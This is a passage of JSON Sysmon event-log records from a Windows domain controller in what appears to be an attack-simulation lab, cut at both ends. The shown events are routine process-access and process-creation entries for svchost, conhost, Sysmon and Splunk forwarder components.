05:58:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7318,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:54.480\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:54.480","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7319,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:54.480\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:54.480","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7320,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:54.480\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:54.480","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7321,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:54.480\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:54.480","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7322,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:54.480\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-00103F1E0500}\r\nSourceProcessId: 2768\r\nSourceThreadId: 2656\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-049E-5F25-0000-001088910F00}\r\nTargetProcessId: 4348\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:54.480","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-00103F1E0500}","SourceProcessId":"2768","SourceThreadId":"2656","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-049E-5F25-0000-001088910F00}","TargetProcessId":"4348","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7323,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:54.621\r\nSourceProcessGUID: {A837DB8D-049E-5F25-0000-001088910F00}\r\nSourceProcessId: 4348\r\nSourceThreadId: 3984\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nTargetProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nTargetProcessId: 2868\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+5691a5|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+568cd6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+56657|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+56ca7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+8f3800|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:54.621","SourceProcessGUID":"{A837DB8D-049E-5F25-0000-001088910F00}","SourceProcessId":"4348","SourceThreadId":"3984","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","TargetProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","TargetProcessId":"2868","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+5691a5|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+568cd6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+56657|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+56ca7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+8f3800|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":7324,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:55.700\r\nProcessGuid: {A837DB8D-049F-5F25-0000-001080940F00}\r\nProcessId: 4416\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\r\nFileVersion: 8.0.2\r\nDescription: Windows Print Monitor \r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-winprintmon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748\r\nParentProcessGuid: {A837DB8D-0239-5F25-0000-001064190500}\r\nParentProcessId: 2868\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:58:55.700","ProcessGuid":"{A837DB8D-049F-5F25-0000-001080940F00}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe","FileVersion":"8.0.2","Description":"Windows Print Monitor ","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-winprintmon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748","ParentProcessGuid":"{A837DB8D-0239-5F25-0000-001064190500}","ParentProcessId":"2868","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 05:58:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7325,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:55.699\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nSourceProcessId: 2868\r\nSourceThreadId: 2168\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {A837DB8D-0484-5F25-0000-001065410D00}\r\nTargetProcessId: 4416\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:55.699","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","SourceProcessId":"2868","SourceThreadId":"2168","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{A837DB8D-0484-5F25-0000-001065410D00}","TargetProcessId":"4416","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7326,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:55.699\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0484-5F25-0000-001065410D00}\r\nTargetProcessId: 4416\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:55.699","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0484-5F25-0000-001065410D00}","TargetProcessId":"4416","TargetImage":"C:\\Program 